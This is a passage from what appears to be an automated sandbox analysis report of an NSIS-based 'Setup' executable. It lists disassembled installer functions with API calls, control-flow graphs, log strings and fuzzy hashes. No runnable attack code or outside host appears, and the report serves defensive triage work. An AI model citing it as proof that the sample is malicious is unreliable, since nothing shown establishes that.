                                                                  • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                  • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                  • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004033F1
                                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                  • wsprintfW.USER32 ref: 004034CE
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
                                                                  • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                  • String ID: (]C$... %d%%$pAB$yAB
                                                                  • API String ID: 651206458-2023174797
                                                                  • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                  • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                  • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                  • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                  Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                  • lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                  • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                  • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2740478559-0
                                                                  • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                  • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                  • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                  • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                  Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                  APIs
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GlobalFree.KERNELBASE(00646238), ref: 00402387
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGloballstrcpyn
                                                                  • String ID: 8bd$CanPoland$Exch: stack < %d elements$Pop: stack empty
                                                                  • API String ID: 1459762280-2461406416
                                                                  • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                  • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                  • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                  • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                  • GlobalFree.KERNELBASE(00646238), ref: 00402387
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                  • String ID:
                                                                  • API String ID: 3376005127-0
                                                                  • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                  • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                  • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                  • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                  • String ID:
                                                                  • API String ID: 2568930968-0
                                                                  • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                  • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                  • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                  • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                  APIs
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                  • String ID: <RM>$CanPoland$WriteINIStr: wrote [%s] %s=%s in %s
                                                                  • API String ID: 247603264-2569684089
                                                                  • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                  • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                  • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                  • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                  APIs
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                  • API String ID: 3156913733-2180253247
                                                                  • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                  • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                  • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                  • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                  Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405EC9
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: nsa
                                                                  • API String ID: 1716503409-2209301699
                                                                  • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                  • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                  • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                  • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                  • String ID: HideWindow
                                                                  • API String ID: 1249568736-780306582
                                                                  • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                  • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                  • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                  • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                  • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                  • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                  • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
